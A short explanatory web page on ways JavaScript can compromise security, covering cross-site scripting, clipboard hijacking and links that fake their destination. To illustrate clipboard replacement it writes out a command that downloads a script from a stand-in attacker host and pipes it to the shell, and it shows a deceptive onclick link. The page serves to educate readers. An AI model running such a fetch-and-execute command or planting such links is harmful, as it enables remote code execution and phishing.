Ways JavaScript can comprimise your security
Cross-site scripting (XSS)
Some websites may have a vulnerability that allows an attacker to inject malicious JavaScript code into a website. The malicious JavaScript code will be executed by the user's browser, allowing the attacker to impersonate the user and collect sensitive data from the user.
Copying malicious commands to your clipboard
Sysadmins, cybersecurity researchers, and programmers often copy and paste commands from websites into their terminals.
For example, a guide may instruct people to update the system with the following:
sudo apt update && sudo apt upgrade
; echo "Not even attacking the visitor requires JS"
But there may be a JavaScript event listener listening for when it's copied, and it will instead copy this:
curl https://attackers.site/payload.sh | sh &
Now instead of updating, the system is running some malicious payload from an attacker. In this case, the text in the clipboard has a return at the end, so it is executed before the user can react to it.
Faking link destinations
<a href="https://example.com" onclick='window.location="page.html"'>π</a>
The link above can appear to go to example.com in the status bar or bottom left corner, but will actually go somewhere else when clicked. This could be used for phishing.